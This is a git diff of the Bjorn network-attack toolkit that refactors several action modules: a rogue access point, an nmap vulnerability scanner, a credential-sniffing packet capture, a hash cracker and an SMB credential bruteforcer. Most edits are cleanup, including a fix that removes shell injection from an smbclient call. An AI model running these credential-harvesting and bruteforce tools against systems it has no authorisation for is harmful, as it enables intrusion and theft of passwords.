self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
|
||||
|
||||
@@ -244,10 +255,12 @@ class LokiDeceiver:
|
||||
for p in [self.hostapd_proc, self.dnsmasq_proc]:
|
||||
if p:
|
||||
try: p.terminate(); p.wait(timeout=5)
|
||||
except: pass
|
||||
except Exception: pass
|
||||
|
||||
# Restore NetworkManager if needed (custom logic based on usage)
|
||||
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,16 +1,11 @@
|
||||
"""
|
||||
Vulnerability Scanner Action
|
||||
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
|
||||
avec fallback "lourd" optionnel.
|
||||
Affiche une progression en % dans Bjorn.
|
||||
"""
|
||||
"""nmap_vuln_scanner.py - Nmap-based CPE/CVE vulnerability scanning with vulners integration."""
|
||||
|
||||
import re
|
||||
import time
|
||||
import nmap
|
||||
import json
|
||||
import logging
|
||||
from datetime import datetime, timedelta
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from typing import Dict, List, Any
|
||||
|
||||
from shared import SharedData
|
||||
@@ -31,18 +26,28 @@ b_priority = 11
|
||||
b_cooldown = 0
|
||||
b_enabled = 1
|
||||
b_rate_limit = None
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["vuln", "nmap", "cpe", "cve", "scanner"]
|
||||
b_category = "recon"
|
||||
b_name = "Nmap Vuln Scanner"
|
||||
b_description = "Nmap-based CPE/CVE vulnerability scanning with vulners integration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "NmapVulnScanner.png"
|
||||
|
||||
# Regex compilé une seule fois (gain CPU sur Pi Zero)
|
||||
# Pre-compiled regex (saves CPU on Pi Zero)
|
||||
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
|
||||
|
||||
|
||||
class NmapVulnScanner:
|
||||
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
|
||||
"""Nmap vulnerability scanner (fast CPE/CVE mode) with progress tracking."""
|
||||
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
# Pas de self.nm partagé : on instancie dans chaque méthode de scan
|
||||
# pour éviter les corruptions d'état entre batches.
|
||||
# No shared self.nm: instantiate per scan method to avoid state corruption between batches
|
||||
logger.info("NmapVulnScanner initialized")
|
||||
|
||||
# ---------------------------- Public API ---------------------------- #
|
||||
@@ -54,7 +59,7 @@ class NmapVulnScanner:
|
||||
self.shared_data.bjorn_progress = "0%"
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
# 1) Metadata
|
||||
meta = {}
|
||||
@@ -63,7 +68,7 @@ class NmapVulnScanner:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2) Récupérer MAC et TOUS les ports
|
||||
# 2) Get MAC and ALL ports
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or ""
|
||||
|
||||
ports_str = ""
|
||||
@@ -87,13 +92,13 @@ class NmapVulnScanner:
|
||||
|
||||
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
|
||||
|
||||
# Nettoyage des ports (garder juste le numéro si format 80/tcp)
|
||||
# Strip port format (keep just the number from "80/tcp")
|
||||
ports = [p.split('/')[0] for p in ports]
|
||||
|
||||
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
|
||||
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
|
||||
|
||||
# 3) Filtrage "Rescan Only"
|
||||
# 3) "Rescan Only" filtering
|
||||
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
|
||||
if self._has_been_scanned(mac):
|
||||
original_count = len(ports)
|
||||
@@ -105,24 +110,24 @@ class NmapVulnScanner:
|
||||
self.shared_data.bjorn_progress = "100%"
|
||||
return 'success'
|
||||
|
||||
# 4) SCAN AVEC PROGRESSION
|
||||
# 4) SCAN WITH PROGRESS
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
|
||||
findings = self.scan_vulnerabilities(ip, ports)
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Scan interrupted by user")
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
# 5) Déduplication en mémoire avant persistance
|
||||
# 5) In-memory dedup before persistence
|
||||
findings = self._deduplicate_findings(findings)
|
||||
|
||||
# 6) Persistance
|
||||
self.save_vulnerabilities(mac, ip, findings)
|
||||
|
||||
# Finalisation UI
|
||||
# Final UI update
|
||||
self.shared_data.bjorn_progress = "100%"
|
||||
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
|
||||
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
|
||||
@@ -130,7 +135,7 @@ class NmapVulnScanner:
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
|
||||
self.shared_data.bjorn_progress = "Error"
|
||||
self.shared_data.bjorn_progress = "0%"
|
||||
return 'failed'
|
||||
|
||||
def _has_been_scanned(self, mac: str) -> bool:
|
||||
@@ -161,7 +166,7 @@ class NmapVulnScanner:
|
||||
|
||||
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
|
||||
if ttl > 0:
|
||||
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
|
||||
cutoff = datetime.now(timezone.utc) - timedelta(seconds=ttl)
|
||||
final_ports = []
|
||||
for p in ports:
|
||||
if p not in seen:
|
||||
@@ -180,7 +185,7 @@ class NmapVulnScanner:
|
||||
# ---------------------------- Helpers -------------------------------- #
|
||||
|
||||
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
|
||||
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
|
||||
"""Remove duplicates (same port + vuln_id) to avoid redundant inserts."""
|
||||
seen: set = set()
|
||||
deduped = []
|
||||
for f in findings:
|
||||
@@ -201,7 +206,7 @@ class NmapVulnScanner:
|
||||
return [str(cpe).strip()]
|
||||
|
||||
def extract_cves(self, text: str) -> List[str]:
|
||||
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
|
||||
"""Extract CVEs using pre-compiled regex."""
|
||||
if not text:
|
||||
return []
|
||||
return CVE_RE.findall(str(text))
|
||||
@@ -210,8 +215,7 @@ class NmapVulnScanner:
|
||||
|
||||
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
"""
|
||||
Orchestre le scan en lots (batches) pour permettre la mise à jour
|
||||
de la barre de progression.
|
||||
Orchestrate scanning in batches for progress bar updates.
|
||||
"""
|
||||
all_findings = []
|
||||
|
||||
@@ -219,10 +223,10 @@ class NmapVulnScanner:
|
||||
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
|
||||
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
|
||||
|
||||
# Pause entre batches – important sur Pi Zero pour laisser respirer le CPU
|
||||
# Pause between batches -- important on Pi Zero to let the CPU breathe
|
||||
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
|
||||
|
||||
# Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
|
||||
# Reduced batch size by default (2 on Pi Zero, configurable)
|
||||
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
|
||||
|
||||
target_ports = ports[:max_ports]
|
||||
@@ -240,7 +244,7 @@ class NmapVulnScanner:
|
||||
|
||||
port_str = ','.join(batch)
|
||||
|
||||
# Mise à jour UI avant le scan du lot
|
||||
# UI update before batch scan
|
||||
pct = int((processed_count / total) * 100)
|
||||
self.shared_data.bjorn_progress = f"{pct}%"
|
||||
self.shared_data.comment_params = {
|
||||
@@ -251,7 +255,7 @@ class NmapVulnScanner:
|
||||
|
||||
t0 = time.time()
|
||||
|
||||
# Scan du lot (instanciation locale pour éviter la corruption d'état)
|
||||
# Scan batch (local instance to avoid state corruption)
|
||||
if fast:
|
||||
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
|
||||
else:
|
||||
@@ -263,11 +267,11 @@ class NmapVulnScanner:
|
||||
all_findings.extend(batch_findings)
|
||||
processed_count += len(batch)
|
||||
|
||||
# Mise à jour post-lot
|
||||
# Post-batch update
|
||||
pct = int((processed_count / total) * 100)
|
||||
self.shared_data.bjorn_progress = f"{pct}%"
|
||||
|
||||
# Pause CPU entre batches (vital sur Pi Zero)
|
||||
# CPU pause between batches (vital on Pi Zero)
|
||||
if batch_pause > 0 and processed_count < total:
|
||||
time.sleep(batch_pause)
|
||||
|
||||
@@ -275,10 +279,10 @@ class NmapVulnScanner:
|
||||
|
||||
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
|
||||
vulns: List[Dict] = []
|
||||
nm = nmap.PortScanner() # Instance locale – pas de partage d'état
|
||||
nm = nmap.PortScanner() # Local instance -- no shared state
|
||||
|
||||
# --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
|
||||
# --min-rate/--max-rate : évite de saturer CPU et réseau
|
||||
# --version-light instead of --version-all: much faster on Pi Zero
|
||||
# --min-rate/--max-rate: avoid saturating CPU and network
|
||||
args = (
|
||||
"-sV --version-light -T4 "
|
||||
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
|
||||
@@ -329,14 +333,14 @@ class NmapVulnScanner:
|
||||
|
||||
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
|
||||
vulnerabilities: List[Dict] = []
|
||||
nm = nmap.PortScanner() # Instance locale
|
||||
nm = nmap.PortScanner() # Local instance
|
||||
|
||||
vuln_scripts = [
|
||||
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
|
||||
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
|
||||
]
|
||||
script_arg = ','.join(vuln_scripts)
|
||||
# --min-rate/--max-rate pour ne pas saturer le Pi
|
||||
# --min-rate/--max-rate to avoid saturating the Pi
|
||||
args = (
|
||||
f"-sV --script={script_arg} -T3 "
|
||||
"--script-timeout 30s --min-rate 50 --max-rate 100"
|
||||
@@ -371,7 +375,7 @@ class NmapVulnScanner:
|
||||
'details': str(output)[:200]
|
||||
})
|
||||
|
||||
# CPE Scan optionnel (sur ce batch)
|
||||
# Optional CPE scan (on this batch)
|
||||
if bool(self.shared_data.config.get('scan_cpe', False)):
|
||||
ports_for_cpe = list(discovered_ports_in_batch)
|
||||
if ports_for_cpe:
|
||||
@@ -381,10 +385,10 @@ class NmapVulnScanner:
|
||||
|
||||
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
cpe_vulns = []
|
||||
nm = nmap.PortScanner() # Instance locale
|
||||
nm = nmap.PortScanner() # Local instance
|
||||
try:
|
||||
port_list = ','.join([str(p) for p in ports])
|
||||
# --version-light à la place de --version-all (bien plus rapide)
|
||||
# --version-light instead of --version-all (much faster)
|
||||
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
|
||||
nm.scan(hosts=ip, ports=port_list, arguments=args)
|
||||
|
||||
@@ -430,7 +434,7 @@ class NmapVulnScanner:
|
||||
if vid_upper.startswith('CVE-'):
|
||||
findings_by_port[port]['cves'].add(vid)
|
||||
elif vid_upper.startswith('CPE:'):
|
||||
# On stocke sans le préfixe "CPE:"
|
||||
# Store without the "CPE:" prefix
|
||||
findings_by_port[port]['cpes'].add(vid[4:])
|
||||
|
||||
# 1) CVEs
|
||||
|
||||
@@ -179,6 +179,10 @@ class OdinEye:
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
"""Standard entry point."""
|
||||
# Reset per-run state to prevent accumulation across reused instances
|
||||
self.credentials.clear()
|
||||
self.statistics.clear()
|
||||
|
||||
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
|
||||
if iface == "auto":
|
||||
iface = None # pyshark handles None as default
|
||||
@@ -186,10 +190,17 @@ class OdinEye:
|
||||
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
|
||||
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
|
||||
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
|
||||
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "packets")
|
||||
output_dir = getattr(self.shared_data, "odin_eye_output", _fallback_dir)
|
||||
|
||||
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
|
||||
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"iface": iface or "any", "filter": bpf_filter[:30]}
|
||||
|
||||
if not HAS_PYSHARK:
|
||||
logger.error("OdinEye requires pyshark but it is not installed.")
|
||||
return "failed"
|
||||
|
||||
try:
|
||||
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
|
||||
@@ -217,6 +228,8 @@ class OdinEye:
|
||||
if packet_count % 50 == 0:
|
||||
prog = int((packet_count / max_pkts) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"packets": str(packet_count), "creds": str(len(self.credentials))}
|
||||
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
|
||||
|
||||
except Exception as e:
|
||||
@@ -226,7 +239,7 @@ class OdinEye:
|
||||
finally:
|
||||
if self.capture:
|
||||
try: self.capture.close()
|
||||
except: pass
|
||||
except Exception: pass
|
||||
|
||||
# Save results
|
||||
if self.credentials or self.statistics['total_packets'] > 0:
|
||||
@@ -238,6 +251,8 @@ class OdinEye:
|
||||
"credentials": self.credentials
|
||||
}, f, indent=4)
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,11 +1,5 @@
|
||||
# actions/presence_join.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
|
||||
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
"""presence_join.py - Discord webhook notification when a target host joins the network."""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
@@ -28,7 +22,20 @@ b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_join only fires on join transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
b_requires = None # Configure via DB to restrict to specific MACs if needed
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_category = "notification"
|
||||
b_name = "Presence Join"
|
||||
b_description = "Sends a Discord webhook notification when a host joins the network."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_timeout = 30
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["presence", "discord", "notification"]
|
||||
b_icon = "PresenceJoin.png"
|
||||
|
||||
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
|
||||
|
||||
@@ -60,7 +67,9 @@ class PresenceJoin:
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
name = f"{host} ({mac})" if host else mac
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
|
||||
@@ -1,11 +1,5 @@
|
||||
# actions/presence_left.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
|
||||
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
"""presence_left.py - Discord webhook notification when a target host leaves the network."""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
@@ -28,8 +22,20 @@ b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_leave only fires on leave transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
b_enabled = 1
|
||||
b_requires = None # Configure via DB to restrict to specific MACs if needed
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_category = "notification"
|
||||
b_name = "Presence Leave"
|
||||
b_description = "Sends a Discord webhook notification when a host leaves the network."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_timeout = 30
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["presence", "discord", "notification"]
|
||||
b_icon = "PresenceLeave.png"
|
||||
|
||||
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
|
||||
|
||||
@@ -60,6 +66,8 @@ class PresenceLeave:
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
@@ -82,7 +82,11 @@ class RuneCracker:
|
||||
return hashlib.sha512(password.encode()).hexdigest()
|
||||
elif h_type == 'ntlm':
|
||||
# NTLM is MD4(UTF-16LE(password))
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
try:
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
except ValueError:
|
||||
# MD4 not available in this Python build (e.g., FIPS mode)
|
||||
return None
|
||||
except Exception as e:
|
||||
logger.debug(f"Hashing error ({h_type}): {e}")
|
||||
return None
|
||||
@@ -107,6 +111,8 @@ class RuneCracker:
|
||||
}
|
||||
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
|
||||
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": str(len(self.cracked))}
|
||||
|
||||
progress.advance()
|
||||
|
||||
@@ -115,7 +121,8 @@ class RuneCracker:
|
||||
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
|
||||
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
|
||||
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
|
||||
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "hashes")
|
||||
output_dir = getattr(self.shared_data, "rune_cracker_output", _fallback_dir)
|
||||
|
||||
if not input_file or not os.path.exists(input_file):
|
||||
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
|
||||
@@ -127,6 +134,8 @@ class RuneCracker:
|
||||
logger.error(f"Input file not found: {input_file}")
|
||||
return "failed"
|
||||
|
||||
# Reset per-run state to prevent accumulation across reused instances
|
||||
self.cracked.clear()
|
||||
# Load hashes
|
||||
self.hashes.clear()
|
||||
try:
|
||||
@@ -150,6 +159,8 @@ class RuneCracker:
|
||||
|
||||
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
|
||||
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": "0"}
|
||||
|
||||
# Prepare password plan
|
||||
dict_passwords = []
|
||||
@@ -167,34 +178,38 @@ class RuneCracker:
|
||||
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
|
||||
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
|
||||
for pwd in all_candidates:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
executor.shutdown(wait=False)
|
||||
return "interrupted"
|
||||
executor.submit(self._crack_password_worker, pwd, progress)
|
||||
except Exception as e:
|
||||
logger.error(f"Cracking engine error: {e}")
|
||||
return "failed"
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
|
||||
for pwd in all_candidates:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
executor.shutdown(wait=False, cancel_futures=True)
|
||||
return "interrupted"
|
||||
executor.submit(self._crack_password_worker, pwd, progress)
|
||||
except Exception as e:
|
||||
logger.error(f"Cracking engine error: {e}")
|
||||
return "failed"
|
||||
|
||||
# Save results
|
||||
if self.cracked:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
|
||||
with open(out_file, 'w', encoding="utf-8") as f:
|
||||
json.dump({
|
||||
"target_file": input_file,
|
||||
"total_hashes": len(self.hashes),
|
||||
"cracked_count": len(self.cracked),
|
||||
"results": self.cracked
|
||||
}, f, indent=4)
|
||||
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
|
||||
return "success"
|
||||
|
||||
logger.info("Cracking finished. No matches found.")
|
||||
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
|
||||
return "success" # Still success even if 0 cracked, as it finished the task
|
||||
# Save results
|
||||
if self.cracked:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
|
||||
with open(out_file, 'w', encoding="utf-8") as f:
|
||||
json.dump({
|
||||
"target_file": input_file,
|
||||
"total_hashes": len(self.hashes),
|
||||
"cracked_count": len(self.cracked),
|
||||
"results": self.cracked
|
||||
}, f, indent=4)
|
||||
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
|
||||
return "success"
|
||||
|
||||
logger.info("Cracking finished. No matches found.")
|
||||
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
|
||||
return "success" # Still success even if 0 cracked, as it finished the task
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Minimal CLI for testing
|
||||
|
||||
@@ -1,13 +1,7 @@
|
||||
# scanning.py – Network scanner (DB-first, no stubs)
|
||||
# - Host discovery (nmap -sn -PR)
|
||||
# - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
|
||||
# - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
|
||||
# - Mark alive=0 for hosts not seen this run
|
||||
# - Update stats (stats table)
|
||||
# - Light logging (milestones) without flooding
|
||||
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
|
||||
# - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
|
||||
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
|
||||
"""scanning.py - Network scanner: host discovery, MAC/hostname resolution, and port scanning.
|
||||
|
||||
DB-first design - all results go straight to SQLite. RPi Zero optimized.
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
@@ -38,6 +32,18 @@ b_priority = 1
|
||||
b_action = "global"
|
||||
b_trigger = "on_interval:180"
|
||||
b_requires = '{"max_concurrent": 1}'
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "low"
|
||||
b_tags = ["scan", "discovery", "network", "nmap"]
|
||||
b_category = "recon"
|
||||
b_name = "Network Scanner"
|
||||
b_description = "Host discovery, MAC/hostname resolution, and port scanning via nmap."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "NetworkScanner.png"
|
||||
|
||||
# --- Module-level constants (avoid re-creating per call) ---
|
||||
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
|
||||
|
||||
@@ -1,12 +1,7 @@
|
||||
"""
|
||||
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles fournies par l’orchestrateur (ip, port)
|
||||
- IP -> (MAC, hostname) depuis DB.hosts
|
||||
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
|
||||
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
|
||||
"""
|
||||
“””smb_bruteforce.py - Threaded SMB credential bruteforcer with share enumeration.”””
|
||||
|
||||
import os
|
||||
import shlex
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
@@ -29,14 +24,27 @@ b_parent = None
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "smb", "credentials", "shares"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SMB Bruteforce"
|
||||
b_description = "Threaded SMB credential bruteforcer with share enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SMBBruteforce.png"
|
||||
|
||||
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
|
||||
|
||||
|
||||
class SMBBruteforce:
|
||||
"""Wrapper orchestrateur -> SMBConnector."""
|
||||
"""Orchestrator wrapper for SMBConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -44,11 +52,11 @@ class SMBBruteforce:
|
||||
logger.info("SMBConnector initialized.")
|
||||
|
||||
def bruteforce_smb(self, ip, port):
|
||||
"""Lance le bruteforce SMB pour (ip, port)."""
|
||||
"""Run SMB bruteforce for (ip, port)."""
|
||||
return self.smb_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "SMBBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
success, results = self.bruteforce_smb(ip, port)
|
||||
@@ -56,12 +64,12 @@ class SMBBruteforce:
|
||||
|
||||
|
||||
class SMBConnector:
|
||||
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
|
||||
"""Handles SMB attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -74,7 +82,7 @@ class SMBConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -142,10 +150,10 @@ class SMBConnector:
|
||||
|
||||
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
|
||||
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
|
||||
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
|
||||
cmd = ['smbclient', '-L', adresse_ip, '-U', f'{user}%{password}']
|
||||
process = None
|
||||
try:
|
||||
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
|
||||
process = Popen(cmd, shell=False, stdout=PIPE, stderr=PIPE)
|
||||
try:
|
||||
